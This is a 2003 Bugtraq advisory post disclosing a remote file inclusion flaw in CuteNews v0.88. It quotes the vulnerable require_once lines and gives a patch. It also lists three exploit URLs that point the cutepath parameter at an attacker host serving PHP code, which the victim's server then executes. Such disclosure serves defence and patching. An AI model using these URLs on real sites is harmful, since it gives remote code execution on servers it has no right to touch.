Bugtraq mailing list archives

PHP code injection in CuteNews

From: "Over_G" <overg () mail ru>
Date: Tue, 25 Feb 2003 14:31:55 +0300

PHP source code injection in CuteNews



Informations :
===============================================
Script : CuteNews v0.88
Offical site : http://air.langame.net/
===============================================

PHP Scripts :
===============================================

shownews.php :

if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");

===============================================

search.php :

require_once("$cutepath/config.php");

===============================================

comments.php :

if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");

===============================================


Exploits :

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/

with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt

Content config.php or news.txt:
Any PHP Code.

===============================================

Patch : 
Replace 

if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");

on $cutepath=".";

===============================================



Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG () mail ru VenoM88 () mail ru

Current thread:

PHP code injection in CuteNews Over_G (Feb 25)
- <Possible follow-ups>
- Re: PHP code injection in CuteNews Steve Grubb (Feb 28)